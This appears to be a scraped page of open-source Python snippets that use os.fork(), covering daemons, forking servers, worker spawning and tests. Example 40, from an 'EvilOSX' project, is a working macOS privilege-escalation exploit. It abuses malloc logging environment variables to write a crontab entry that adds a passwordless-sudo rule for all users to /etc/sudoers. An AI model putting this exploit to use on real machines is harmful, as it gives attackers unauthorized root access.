Python os.fork() Examples

The following code examples show how to use os.fork(). They are taken from open source Python projects.
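On POSIX systems os.fork() clones the calling process: it returns 0 in the child and the child's PID in the parent. As background, a minimal sketch of the pattern every example below builds on:

import os

pid = os.fork()
if pid == 0:
    # Child: fork() returned 0 here; do the work, then exit without
    # running the parent's cleanup handlers.
    print('child pid: %d' % os.getpid())
    os._exit(0)
else:
    # Parent: fork() returned the child's PID; reap it to avoid a zombie.
    os.waitpid(pid, 0)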

Example 1
Project: evolution-strategies-starter   Author: openai   File: main.py    MIT License
def workers(master_host, master_port, relay_socket_path, num_workers):
    # Start the relay
    master_redis_cfg = {'host': master_host, 'port': master_port}
    relay_redis_cfg = {'unix_socket_path': relay_socket_path}
    if os.fork() == 0:
        RelayClient(master_redis_cfg, relay_redis_cfg).run()
        return
    # Start the workers
    noise = SharedNoiseTable()  # Workers share the same noise
    num_workers = num_workers if num_workers else os.cpu_count()
    logging.info('Spawning {} workers'.format(num_workers))
    for _ in range(num_workers):
        if os.fork() == 0:
            run_worker(relay_redis_cfg, noise=noise)
            return
    os.wait() 
Example 2
Project: pyblish-win   Author: pyblish   File: popen2.py    GNU Lesser General Public License v3.0
def __init__(self, cmd, bufsize=-1):
        _cleanup()
        self.cmd = cmd
        p2cread, p2cwrite = os.pipe()
        c2pread, c2pwrite = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child
            os.dup2(p2cread, 0)
            os.dup2(c2pwrite, 1)
            os.dup2(c2pwrite, 2)
            self._run_child(cmd)
        os.close(p2cread)
        self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
        os.close(c2pwrite)
        self.fromchild = os.fdopen(c2pread, 'r', bufsize) 
Example 3
Project: pyblish-win   Author: pyblish   File: SocketServer.py    GNU Lesser General Public License v3.0
def shutdown(self):
        """Stops the serve_forever loop.

        Blocks until the loop has finished. This must be called while
        serve_forever() is running in another thread, or it will
        deadlock.
        """
        self.__shutdown_request = True
        self.__is_shut_down.wait()

    # The distinction between handling, getting, processing and
    # finishing a request is fairly arbitrary.  Remember:
    #
    # - handle_request() is the top-level call.  It calls
    #   select, get_request(), verify_request() and process_request()
    # - get_request() is different for stream or datagram sockets
    # - process_request() is the place that may fork a new process
    #   or create a new thread to finish the request
    # - finish_request() instantiates the request handler class;
    #   this constructor will handle the request all by itself 
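The comment block above describes the request pipeline; as a minimal usage sketch of the forking variant (written against the Python 3 socketserver module, not taken from the project above):

import socketserver

class EchoHandler(socketserver.StreamRequestHandler):
    def handle(self):
        # finish_request() instantiated this handler; serve one client.
        self.wfile.write(self.rfile.readline())

if __name__ == '__main__':
    # ForkingTCPServer's process_request() calls os.fork() per connection.
    with socketserver.ForkingTCPServer(('127.0.0.1', 9999), EchoHandler) as server:
        server.serve_forever()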
Example 4
Project: pyblish-win   Author: pyblish   File: SocketServer.py    GNU Lesser General Public License v3.0
def process_request(self, request, client_address):
        """Fork a new subprocess to process the request."""
        self.collect_children()
        pid = os.fork()
        if pid:
            # Parent process
            if self.active_children is None:
                self.active_children = set()
            self.active_children.add(pid)
            self.close_request(request) #close handle in parent process
            return
        else:
            # Child process.
            # This must never return, hence os._exit()!
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
                os._exit(0)
            except:
                try:
                    self.handle_error(request, client_address)
                    self.shutdown_request(request)
                finally:
                    os._exit(1) 
Example 5
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0
def test_dummy_thread_after_fork(self):
        # Issue #14308: a dummy thread in the active list doesn't mess up
        # the after-fork mechanism.
        code = """if 1:
            import thread, threading, os, time

            def background_thread(evt):
                # Creates and registers the _DummyThread instance
                threading.current_thread()
                evt.set()
                time.sleep(10)

            evt = threading.Event()
            thread.start_new_thread(background_thread, (evt,))
            evt.wait()
            assert threading.active_count() == 2, threading.active_count()
            if os.fork() == 0:
                assert threading.active_count() == 1, threading.active_count()
                os._exit(0)
            else:
                os.wait()
        """
        _, out, err = assert_python_ok("-c", code)
        self.assertEqual(out, '')
        self.assertEqual(err, '') 
Example 6
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0
def test_3_join_in_forked_from_thread(self):
        # Like the test above, but fork() was called from a worker thread
        # In the forked process, the main Thread object must be marked as stopped.
        script = """if 1:
            main_thread = threading.current_thread()
            def worker():
                childpid = os.fork()
                if childpid != 0:
                    os.waitpid(childpid, 0)
                    sys.exit(0)

                t = threading.Thread(target=joiningfunc,
                                     args=(main_thread,))
                print 'end of main'
                t.start()
                t.join() # Should not block: main_thread is already stopped

            w = threading.Thread(target=worker)
            w.start()
            """
        self._run_and_join(script) 
Example 7
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0
def test_reinit_tls_after_fork(self):
        # Issue #13817: fork() would deadlock in a multithreaded program with
        # the ad-hoc TLS implementation.

        def do_fork_and_wait():
            # just fork a child process and wait it
            pid = os.fork()
            if pid > 0:
                os.waitpid(pid, 0)
            else:
                os._exit(0)

        # start a bunch of threads that will fork() child processes
        threads = []
        for i in range(16):
            t = threading.Thread(target=do_fork_and_wait)
            threads.append(t)
            t.start()

        for t in threads:
            t.join() 
Example 8
Project: pyblish-win   Author: pyblish   File: test_thread.py    GNU Lesser General Public License v3.0
def test_forkinthread(self):
        def thread1():
            try:
                pid = os.fork() # fork in a thread
            except RuntimeError:
                sys.exit(0) # exit the child

            if pid == 0: # child
                os.close(self.read_fd)
                os.write(self.write_fd, "OK")
                sys.exit(0)
            else: # parent
                os.close(self.write_fd)

        thread.start_new_thread(thread1, ())
        self.assertEqual(os.read(self.read_fd, 2), "OK",
                         "Unable to fork() in thread") 
Example 9
Project: pyblish-win   Author: pyblish   File: test_uuid.py    GNU Lesser General Public License v3.0
def testIssue8621(self):
        # On at least some versions of OSX uuid.uuid4 generates
        # the same sequence of UUIDs in the parent and any
        # children started using fork.
        fds = os.pipe()
        pid = os.fork()
        if pid == 0:
            os.close(fds[0])
            value = uuid.uuid4()
            os.write(fds[1], value.hex)
            os._exit(0)

        else:
            os.close(fds[1])
            self.addCleanup(os.close, fds[0])
            parent_value = uuid.uuid4().hex
            os.waitpid(pid, 0)
            child_value = os.read(fds[0], 100)

            self.assertNotEqual(parent_value, child_value) 
Example 10
Project: pyblish-win   Author: pyblish   File: test_platform.py    GNU Lesser General Public License v3.0
def test_mac_ver_with_fork(self):
        # Issue7895: platform.mac_ver() crashes when using fork without exec
        #
        # This test checks that the fix for that issue works.
        #
        pid = os.fork()
        if pid == 0:
            # child
            info = platform.mac_ver()
            os._exit(0)

        else:
            # parent
            cpid, sts = os.waitpid(pid, 0)
            self.assertEqual(cpid, pid)
            self.assertEqual(sts, 0) 
Example 11
Project: pyblish-win   Author: pyblish   File: forking.py    GNU Lesser General Public License v3.0
def get_command_line():
        '''
        Returns prefix of command line used for spawning a child process
        '''
        if getattr(process.current_process(), '_inheriting', False):
            raise RuntimeError('''
            Attempt to start a new process before the current process
            has finished its bootstrapping phase.

            This probably means that you are on Windows and you have
            forgotten to use the proper idiom in the main module:

                if __name__ == '__main__':
                    freeze_support()
                    ...

            The "freeze_support()" line can be omitted if the program
            is not going to be frozen to produce a Windows executable.''')

        if getattr(sys, 'frozen', False):
            return [sys.executable, '--multiprocessing-fork']
        else:
            prog = 'from multiprocessing.forking import main; main()'
            opts = util._args_from_interpreter_flags()
            return [_python_exe] + opts + ['-c', prog, '--multiprocessing-fork'] 
Example 12
Project: flasky   Author: RoseOu   File: arbiter.py    MIT License
def reexec(self):
        """\
        Relaunch the master and workers.
        """
        if self.pidfile is not None:
            self.pidfile.rename("%s.oldbin" % self.pidfile.fname)

        self.reexec_pid = os.fork()
        if self.reexec_pid != 0:
            self.master_name = "Old Master"
            return

        environ = self.cfg.env_orig.copy()
        fds = [l.fileno() for l in self.LISTENERS]
        environ['GUNICORN_FD'] = ",".join([str(fd) for fd in fds])

        os.chdir(self.START_CTX['cwd'])
        self.cfg.pre_exec(self)

        # exec the process using the original environnement
        os.execvpe(self.START_CTX[0], self.START_CTX['args'], environ) 
Example 13
Project: core   Author: lifemapper   File: daemon.py    GNU General Public License v3.0
def daemonize(self):
        """
        @summary: do the UNIX double-fork magic, see Stevens' "Advanced
                Programming in the UNIX Environment" for details (ISBN 0201563177)
                http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
        """
        try:
            pid = os.fork()
            if pid > 0:
                # exit first parent
                sys.exit(0)
        except OSError, e:
            self.log.error("Fork #1 failed: %d (%s)" % (e.errno, e.strerror))
            sys.exit(1)
         
        # decouple from parent environment 
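The excerpt is truncated at this point; a sketch of how the standard double-fork recipe usually continues (this is not the project's exact code; the steamlink and Ansible examples below show complete variants):

        os.chdir("/")
        os.setsid()
        os.umask(0)

        # do second fork so the daemon can never reacquire a controlling terminal
        try:
            pid = os.fork()
            if pid > 0:
                sys.exit(0)
        except OSError, e:
            self.log.error("Fork #2 failed: %d (%s)" % (e.errno, e.strerror))
            sys.exit(1)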
Example 14
Project: InsightAgent   Author: insightfinder   File: insightagent-boilerplate.py    Apache License 2.0
def start_data_processing(thread_number):
    """ TODO: replace with your code.
    Most work regarding sending to IF is abstracted away for you.
    This function will get the data to send and prepare it for the API.
    The general outline should be:
    0. Define the project type in config.ini
    1. Parse config options
    2. Gather data
    3. Parse each entry
    4. Call the appropriate handoff function
        metric_handoff()
        log_handoff()
        alert_handoff()
        incident_handoff()
        deployment_handoff()
    See zipkin for an example that uses os.fork to send both metric and log data.
    """ 
Example 15
Project: InsightAgent   Author: insightfinder   File: getmetrics_zipkin.py    Apache License 2.0
def start_data_processing():
    """ get traces from the last <samplingInterval> minutes """
    # fork off a process to handle metric agent
    parent = os.fork()
    if parent > 0:
        track['mode'] = "LOG"
        if_config_vars['projectName'] += '-log'
        logger.debug(str(os.getpid()) + ' is running the log agent')
    else:
        track['mode'] = "METRIC"
        if_config_vars['projectName'] += '-metric'
        logger.debug(str(os.getpid()) + ' is running the metric agent')
    timestamp_fixed = int(time.time() * 1000)
    traces = zipkin_get_traces()
    for trace in traces:
        for span in trace:
            process_zipkin_span(timestamp_fixed, span) 
Example 16
Project: steamlink   Author: steamlink   File: util.py    MIT License
def daemonize() -> None:
	"""Move current process to daemon process."""
	# Create first fork
	pid = os.fork()
	if pid > 0:
		sys.exit(0)

	# Decouple fork
	os.setsid()

	# Create second fork
	pid = os.fork()
	if pid > 0:
		sys.exit(0)

	# redirect standard file descriptors to devnull
	infd = open(os.devnull, 'r')
	outfd = open(os.devnull, 'a+')
	sys.stdout.flush()
	sys.stderr.flush()
	os.dup2(infd.fileno(), sys.stdin.fileno())
	os.dup2(outfd.fileno(), sys.stdout.fileno())
	os.dup2(outfd.fileno(), sys.stderr.fileno()) 
Example 17
Project: rtp_cluster   Author: sippy   File: misc.py    BSD 2-Clause "Simplified" License
def daemonize(logfile = None):
    # Fork once
    if os.fork() != 0:
        os._exit(0)
    # Create new session
    os.setsid()
    if os.fork() != 0:
        os._exit(0)
    os.chdir('/')
    fd = os.open('/dev/null', os.O_RDWR)
    os.dup2(fd, sys.__stdin__.fileno())
    if logfile != None:
        fake_stdout = open(logfile, 'a', 1)
        sys.stdout = fake_stdout
        sys.stderr = fake_stdout
        fd = fake_stdout.fileno()
    os.dup2(fd, sys.__stdout__.fileno())
    os.dup2(fd, sys.__stderr__.fileno())
    if logfile == None:
        os.close(fd) 
Example 18
Project: gcp-variant-transforms   Author: googlegenomics   File: vcf_parser.py    Apache License 2.0
def _init_with_header(self, header_lines):
    # PySam requires a version header to be present, so add one if absent.
    if header_lines and not header_lines[0].startswith(
        FILE_FORMAT_HEADER_TEMPLATE.format(VERSION='')):
      header_lines.insert(0, FILE_FORMAT_HEADER_TEMPLATE.format(VERSION='4.0'))

    # Pysam pipe is responsible for supplying lines from child process into the
    # VariantFile, since it can only take an actual file descriptor as an input.
    pysam_read, pysam_write = os.pipe()
    # Since child process doesn't have access to the lines that need to be
    # parsed, variants pipe is needed to supply them from _get_variant() method
    # into the child process, to be propagated afterwards into the pysam pipe.
    variants_read, variants_write = os.pipe()
    pid = os.fork()
    if pid:
      self._process_pid = pid
      self._init_parent_process(pysam_read, variants_write)
    else:
      self._init_child_process(variants_read, pysam_write, header_lines) 
Example 19
Project: Repobot   Author: Desgard   File: socketserver.py    MIT License
def process_request(self, request, client_address):
        """Fork a new subprocess to process the request."""
        pid = os.fork()
        if pid:
            # Parent process
            if self.active_children is None:
                self.active_children = []
            self.active_children.append(pid)
            self.close_request(request)
            return
        else:
            # Child process.
            # This must never return, hence os._exit()!
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
                os._exit(0)
            except:
                try:
                    self.handle_error(request, client_address)
                    self.shutdown_request(request)
                finally:
                    os._exit(1) 
Example 20
Project: vscode-mayapy   Author: FXTD-ODYSSEY   File: _pydev_SocketServer.py    MIT License
def shutdown(self):
        """Stops the serve_forever loop.

        Blocks until the loop has finished. This must be called while
        serve_forever() is running in another thread, or it will
        deadlock.
        """
        self.__shutdown_request = True
        self.__is_shut_down.wait()

    # The distinction between handling, getting, processing and
    # finishing a request is fairly arbitrary.  Remember:
    #
    # - handle_request() is the top-level call.  It calls
    #   select, get_request(), verify_request() and process_request()
    # - get_request() is different for stream or datagram sockets
    # - process_request() is the place that may fork a new process
    #   or create a new thread to finish the request
    # - finish_request() instantiates the request handler class;
    #   this constructor will handle the request all by itself 
Example 21
Project: vscode-mayapy   Author: FXTD-ODYSSEY   File: _pydev_SocketServer.py    MIT License
def process_request(self, request, client_address):
        """Fork a new subprocess to process the request."""
        self.collect_children()
        pid = os.fork()  # @UndefinedVariable
        if pid:
            # Parent process
            if self.active_children is None:
                self.active_children = []
            self.active_children.append(pid)
            self.close_request(request) #close handle in parent process
            return
        else:
            # Child process.
            # This must never return, hence os._exit()!
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
                os._exit(0)
            except:
                try:
                    self.handle_error(request, client_address)
                    self.shutdown_request(request)
                finally:
                    os._exit(1) 
Example 22
Project: PiFan   Author: Dualion   File: daemon.py    GNU General Public License v2.0
def daemonize(self):
        """
        do the UNIX double-fork magic, see Stevens' "Advanced
        Programming in the UNIX Environment" for details (ISBN 0201563177)
        """
        # Finish up with the current stdout/stderr
        sys.stdout.flush()
        sys.stderr.flush()
        try:
            pid = os.fork()
            if pid > 0:
                # exit first parent
                sys.exit(0)
        except OSError, e:
            sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1)

        # decouple from parent environment 
Example 23
Project: py   Author: pytest-dev   File: forkedfunc.py    MIT License
def __init__(self, fun, args=None, kwargs=None, nice_level=0,
                 child_on_start=None, child_on_exit=None):
        if args is None:
            args = []
        if kwargs is None:
            kwargs = {}
        self.fun = fun
        self.args = args
        self.kwargs = kwargs
        self.tempdir = tempdir = py.path.local.mkdtemp()
        self.RETVAL = tempdir.ensure('retval')
        self.STDOUT = tempdir.ensure('stdout')
        self.STDERR = tempdir.ensure('stderr')

        pid = os.fork()
        if pid:  # in parent process
            self.pid = pid
        else:  # in child process
            self.pid = None
            self._child(nice_level, child_on_start, child_on_exit) 
Example 24
Project: pyblish-win   Author: pyblish   File: popen2.py    GNU Lesser General Public License v3.0
def __init__(self, cmd, capturestderr=False, bufsize=-1):
        """The parameter 'cmd' is the shell command to execute in a
        sub-process.  On UNIX, 'cmd' may be a sequence, in which case arguments
        will be passed directly to the program without shell intervention (as
        with os.spawnv()).  If 'cmd' is a string it will be passed to the shell
        (as with os.system()).   The 'capturestderr' flag, if true, specifies
        that the object should capture standard error output of the child
        process.  The default is false.  If the 'bufsize' parameter is
        specified, it specifies the size of the I/O buffers to/from the child
        process."""
        _cleanup()
        self.cmd = cmd
        p2cread, p2cwrite = os.pipe()
        c2pread, c2pwrite = os.pipe()
        if capturestderr:
            errout, errin = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child
            os.dup2(p2cread, 0)
            os.dup2(c2pwrite, 1)
            if capturestderr:
                os.dup2(errin, 2)
            self._run_child(cmd)
        os.close(p2cread)
        self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
        os.close(c2pwrite)
        self.fromchild = os.fdopen(c2pread, 'r', bufsize)
        if capturestderr:
            os.close(errin)
            self.childerr = os.fdopen(errout, 'r', bufsize)
        else:
            self.childerr = None 
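A minimal Python 2 usage sketch for the class above (illustration only; this __init__ belongs to popen2's Popen3 class):

p = Popen3(['tr', 'a-z', 'A-Z'], capturestderr=True)
p.tochild.write('hello\n')
p.tochild.close()
print p.fromchild.read()  # prints 'HELLO'
p.wait()                  # reap the child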
Example 25
Project: pyblish-win   Author: pyblish   File: subprocess.py    GNU Lesser General Public License v3.0
def pipe_cloexec(self):
            """Create a pipe with FDs set CLOEXEC."""
            # Pipes' FDs are set CLOEXEC by default because we don't want them
            # to be inherited by other subprocesses: the CLOEXEC flag is removed
            # from the child's FDs by _dup2(), between fork() and exec().
            # This is not atomic: we would need the pipe2() syscall for that.
            r, w = os.pipe()
            self._set_cloexec_flag(r)
            self._set_cloexec_flag(w)
            return r, w 
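The comment notes that creating the pipe and then setting CLOEXEC is not atomic without the pipe2() syscall. Python 3.3+ exposes that syscall directly (a sketch; the excerpt above is from the Python 2 subprocess module):

import os

# Both descriptors are created with CLOEXEC already set, atomically.
r, w = os.pipe2(os.O_CLOEXEC)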
Example 26
Project: pyblish-win   Author: pyblish   File: test_signal.py    GNU Lesser General Public License v3.0
def test_main(self):
        # This function spawns a child process to insulate the main
        # test-running process from all the signals. It then
        # communicates with that child process over a pipe and
        # re-raises information about any exceptions the child
        # raises. The real work happens in self.run_test().
        os_done_r, os_done_w = os.pipe()
        with closing(os.fdopen(os_done_r)) as done_r, \
             closing(os.fdopen(os_done_w, 'w')) as done_w:
            child = os.fork()
            if child == 0:
                # In the child process; run the test and report results
                # through the pipe.
                try:
                    done_r.close()
                    # Have to close done_w again here because
                    # exit_subprocess() will skip the enclosing with block.
                    with closing(done_w):
                        try:
                            self.run_test()
                        except:
                            pickle.dump(traceback.format_exc(), done_w)
                        else:
                            pickle.dump(None, done_w)
                except:
                    print 'Uh oh, raised from pickle.'
                    traceback.print_exc()
                finally:
                    exit_subprocess()

            done_w.close()
            # Block for up to MAX_DURATION seconds for the test to finish.
            r, w, x = select.select([done_r], [], [], self.MAX_DURATION)
            if done_r in r:
                tb = pickle.load(done_r)
                if tb:
                    self.fail(tb)
            else:
                os.kill(child, signal.SIGKILL)
                self.fail('Test deadlocked after %d seconds.' %
                          self.MAX_DURATION) 
Example 27
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0
def test_2_join_in_forked_process(self):
        # Like the test above, but from a forked interpreter
        script = """if 1:
            childpid = os.fork()
            if childpid != 0:
                os.waitpid(childpid, 0)
                sys.exit(0)

            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            print 'end of main'
            """
        self._run_and_join(script) 
Example 28
Project: pyblish-win   Author: pyblish   File: test_socketserver.py    GNU Lesser General Public License v3.0
def simple_subprocess(testcase):
    pid = os.fork()
    if pid == 0:
        # Don't raise an exception; it would be caught by the test harness.
        os._exit(72)
    yield None
    pid2, status = os.waitpid(pid, 0)
    testcase.assertEqual(pid2, pid)
    testcase.assertEqual(72 << 8, status) 
Example 29
Project: pyblish-win   Author: pyblish   File: fork_wait.py    GNU Lesser General Public License v3.0
def test_wait(self):
        for i in range(NUM_THREADS):
            thread.start_new(self.f, (i,))

        time.sleep(LONGSLEEP)

        a = self.alive.keys()
        a.sort()
        self.assertEqual(a, range(NUM_THREADS))

        prefork_lives = self.alive.copy()

        if sys.platform in ['unixware7']:
            cpid = os.fork1()
        else:
            cpid = os.fork()

        if cpid == 0:
            # Child
            time.sleep(LONGSLEEP)
            n = 0
            for key in self.alive:
                if self.alive[key] != prefork_lives[key]:
                    n += 1
            os._exit(n)
        else:
            # Parent
            self.wait_impl(cpid)
            # Tell threads to die
            self.stop = 1
            time.sleep(2*SHORTSLEEP) # Wait for threads to die 
Example 30
Project: pyblish-win   Author: pyblish   File: test_mailbox.py    GNU Lesser General Public License v3.0
def test_lock_conflict(self):
        # Fork off a child process that will lock the mailbox temporarily,
        # unlock it and exit.
        c, p = socket.socketpair()
        self.addCleanup(c.close)
        self.addCleanup(p.close)

        pid = os.fork()
        if pid == 0:
            # child
            try:
                # lock the mailbox, and signal the parent it can proceed
                self._box.lock()
                c.send(b'c')

                # wait until the parent is done, and unlock the mailbox
                c.recv(1)
                self._box.unlock()
            finally:
                os._exit(0)

        # In the parent, wait until the child signals it locked the mailbox.
        p.recv(1)
        try:
            self.assertRaises(mailbox.ExternalClashError,
                              self._box.lock)
        finally:
            # Signal the child it can now release the lock and exit.
            p.send(b'p')
            # Wait for child to exit.  Locking should now succeed.
            exited_pid, status = os.waitpid(pid, 0)

        self._box.lock()
        self._box.unlock() 
Example 31
Project: pyblish-win   Author: pyblish   File: forking.py    GNU Lesser General Public License v3.0
def __init__(self, process_obj):
            sys.stdout.flush()
            sys.stderr.flush()
            self.returncode = None

            self.pid = os.fork()
            if self.pid == 0:
                if 'random' in sys.modules:
                    import random
                    random.seed()
                code = process_obj._bootstrap()
                sys.stdout.flush()
                sys.stderr.flush()
                os._exit(code) 
Example 32
Project: pyblish-win   Author: pyblish   File: forking.py    GNU Lesser General Public License v3.0
def is_forking(argv):
        '''
        Return whether commandline indicates we are forking
        '''
        if len(argv) >= 2 and argv[1] == '--multiprocessing-fork':
            assert len(argv) == 3
            return True
        else:
            return False 
Example 33
Project: Learning-Concurrency-in-Python   Author: PacktPublishing   File: forking.py    MIT License
def parent(): 
  print("We are in the parent process with PID= %d"%os.getpid())
  newRef=os.fork() 
  if newRef==0: 
    child() 
  else: 
    print("We are in the parent process and our child process has PID= %d"%newRef) 
Example 34
Project: Ansible-Example-AB2018   Author: umit-ozturk   File: async_wrapper.py    MIT License
def daemonize_self():
    # daemonizing code: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66012
    try:
        pid = os.fork()
        if pid > 0:
            # exit first parent
            sys.exit(0)
    except OSError:
        e = sys.exc_info()[1]
        sys.exit("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))

    # decouple from parent environment (does not chdir / to keep the directory context the same as for non async tasks)
    os.setsid()
    os.umask(int('022', 8))

    # do second fork
    try:
        pid = os.fork()
        if pid > 0:
            # print "Daemon PID %d" % pid
            sys.exit(0)
    except OSError:
        e = sys.exc_info()[1]
        sys.exit("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))

    dev_null = open('/dev/null', 'w')
    os.dup2(dev_null.fileno(), sys.stdin.fileno())
    os.dup2(dev_null.fileno(), sys.stdout.fileno())
    os.dup2(dev_null.fileno(), sys.stderr.fileno())


# NB: this function copied from module_utils/json_utils.py. Ensure any changes are propagated there.
# FUTURE: AnsibleModule-ify this module so it's Ansiballz-compatible and can use the module_utils copy of this function. 
Example 35
Project: flasky   Author: RoseOu   File: arbiter.py    MIT License
def spawn_worker(self):
        self.worker_age += 1
        worker = self.worker_class(self.worker_age, self.pid, self.LISTENERS,
                                   self.app, self.timeout / 2.0,
                                   self.cfg, self.log)
        self.cfg.pre_fork(self, worker)
        pid = os.fork()
        if pid != 0:
            self.WORKERS[pid] = worker
            return pid

        # Process Child
        worker_pid = os.getpid()
        try:
            util._setproctitle("worker [%s]" % self.proc_name)
            self.log.info("Booting worker with pid: %s", worker_pid)
            self.cfg.post_fork(self, worker)
            worker.init_process()
            sys.exit(0)
        except SystemExit:
            raise
        except AppImportError as e:
            self.log.debug("Exception while loading the application: \n%s",
                           traceback.format_exc())
            print("%s" % e, file=sys.stderr)
            sys.stderr.flush()
            sys.exit(self.APP_LOAD_ERROR)
        except:
            self.log.exception("Exception in worker process:\n%s",
                               traceback.format_exc())
            if not worker.booted:
                sys.exit(self.WORKER_BOOT_ERROR)
            sys.exit(-1)
        finally:
            self.log.info("Worker exiting (pid: %s)", worker_pid)
            try:
                worker.tmp.close()
                self.cfg.worker_exit(self, worker)
            except:
                pass 
Example 36
Project: InsightAgent   Author: insightfinder   File: getmessages_prometheus.py    Apache License 2.0
def start_data_processing(thread_number):
    end_time = int(time.time())
    start_time = end_time - if_config_vars['run_interval']

    pid = 0 if 'METRIC' in if_config_vars['project_type'] else 1
    if len(if_config_vars['project_type']) > 1:
        pid = os.fork()
    if pid == 0:
        # metric
        logger.debug(str(os.getpid()) + ' is running the metric agent')
        dispatch_metric_agent(start_time, end_time)
    else:
        # alert agent
        logger.debug(str(os.getpid()) + ' is running the alert agent')
        dispatch_alert_agent(start_time) 
Example 37
Project: ngo-addons-backport   Author: camptocamp   File: workers.py    GNU Affero General Public License v3.0
def worker_spawn(self, klass, workers_registry):
        self.generation += 1
        worker = klass(self)
        pid = os.fork()
        if pid != 0:
            worker.pid = pid
            self.workers[pid] = worker
            workers_registry[pid] = worker
            return worker
        else:
            worker.run()
            sys.exit(0) 
Example 38
Project: testing.postgresql   Author: tk0miya   File: test_postgresql.py    Apache License 2.0
def test_fork(self):
        pgsql = testing.postgresql.Postgresql()
        if os.fork() == 0:
            del pgsql
            pgsql = None
            os.kill(os.getpid(), signal.SIGTERM)  # exit the tests forcibly
        else:
            os.wait()
            sleep(1)
            self.assertTrue(pgsql.is_alive())  # process is alive (deleting the pgsql obj in the child does not affect it)
Example 39
Project: testing.postgresql   Author: tk0miya   File: test_postgresql.py    Apache License 2.0
def test_stop_on_child_process(self):
        pgsql = testing.postgresql.Postgresql()
        if os.fork() == 0:
            pgsql.stop()
            os.kill(pgsql.server_pid, 0)  # process is alive (calling stop() is ignored)
            os.kill(os.getpid(), signal.SIGTERM)  # exit the tests forcibly
        else:
            os.wait()
            sleep(1)
            self.assertTrue(pgsql.is_alive())  # process is alive (calling stop() in child is ignored) 
Example 40
Project: EvilOSX   Author: cys3c   File: LPE_10-10-5.py    GNU General Public License v3.0
def get_root():
    env = {}
    old_size = os.stat("/etc/sudoers").st_size

    env['MallocLogFile'] = '/etc/crontab'
    env['MallocStackLogging'] = 'yes'
    env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'

    print "Creating /etc/crontab..."

    p = os.fork()
    if p == 0:
        os.close(1)
        os.close(2)
        os.execve("/usr/bin/rsh", ["rsh", "localhost"], env)

    time.sleep(1)

    if "NOPASSWD" not in open("/etc/crontab").read():
        print "FAILED!"
        exit(-1)

    print "Done, waiting for /etc/sudoers to update..."

    while os.stat("/etc/sudoers").st_size == old_size:
        time.sleep(1)

    print "Exploit completed."
    os.system("sudo rm -rf /etc/crontab")
    exit() 
Example 41
Project: openhatch   Author: campbe13   File: platforms.py    GNU Affero General Public License v3.0
def _detach(self):
        if os.fork() == 0:      # first child
            os.setsid()         # create new session
            if os.fork() > 0:   # second child
                os._exit(0)
        else:
            os._exit(0)
        return self 
Example 42
Project: openhatch   Author: campbe13   File: case.py    GNU Affero General Public License v3.0
def _fork_and_exec(self):
        pid = os.fork()
        if pid == 0:
            from celery import current_app
            current_app.worker_main(["celeryd", "--loglevel=DEBUG",
                                                "-n", self.hostname])
            os._exit(0)
        self.pid = pid 
Example 43
Project: certidude   Author: laurivosandi   File: __init__.py    MIT License
def fork(self):
        for j in range(self.FORKS):
            if not os.fork():
                self.run()
                return True
        return False 
Example 44
Project: metlab   Author: norling   File: controller.py    GNU General Public License v3.0
def metlab_controller(socket_name="metlab.sock"):

    try:  # Fork a child process so the parent can exit.
        pid = os.fork()
    except OSError as e:
        raise Exception("%d: %s" % (e.errno, e.strerror))
    if pid == 0:
        os.setsid()
    else:
        os._exit(0)

    controller = MetLabController(socket_name=socket_name)
    controller.run()
Example 45
Project: Repobot   Author: Desgard   File: test__UserFriendlyRNG.py    MIT License
def runTest(self):
        # Another regression test for CVE-2013-1445.  This is basically the
        # same as RNGForkTest, but less compatible with old versions of Python,
        # and a little easier to read.

        n_procs = 5
        manager = multiprocessing.Manager()
        queues = [manager.Queue(1) for i in range(n_procs)]

        # Reseed the pool
        time.sleep(0.15)
        Crypto.Random._UserFriendlyRNG._get_singleton().reinit()
        Crypto.Random.get_random_bytes(1)

        # Start the child processes
        pool = multiprocessing.Pool(processes=n_procs, initializer=Crypto.Random.atfork)
        map_result = pool.map_async(_task_main, queues)

        # Get the results, ensuring that no pool processes are reused.
        aa = [queues[i].get(30) for i in range(n_procs)]
        bb = [queues[i].get(30) for i in range(n_procs)]
        res = list(zip(aa, bb))

        # Shut down the pool
        map_result.get(30)
        pool.close()
        pool.join()

        # Check that the results are unique
        if len(set(aa)) != len(aa) or len(set(res)) != len(res):
            raise AssertionError("RNG output duplicated across fork():\n%s" %
                                 (pprint.pformat(res),)) 
Example 46
Project: Repobot   Author: Desgard   File: _UserFriendlyRNG.py    MIT License
def _check_pid(self):
        # Lame fork detection to remind developers to invoke Random.atfork()
        # after every call to os.fork().  Note that this check is not reliable,
        # since process IDs can be reused on most operating systems.
        #
        # You need to do Random.atfork() in the child process after every call
        # to os.fork() to avoid reusing PRNG state.  If you want to avoid
        # leaking PRNG state to child processes (for example, if you are using
        # os.setuid()) then you should also invoke Random.atfork() in the
        # *parent* process.
        if os.getpid() != self._pid:
            raise AssertionError("PID check failed. RNG must be re-initialized after fork(). Hint: Try Random.atfork()") 
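A minimal sketch of the idiom this comment prescribes (assumes PyCrypto's Crypto.Random is installed):

import os
import Crypto.Random

pid = os.fork()
if pid == 0:
    Crypto.Random.atfork()  # re-seed the PRNG state inherited from the parent
    nonce = Crypto.Random.get_random_bytes(16)
    os._exit(0)
else:
    os.waitpid(pid, 0)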
Example 47
Project: Repobot   Author: Desgard   File: _fork_pty.py    MIT License
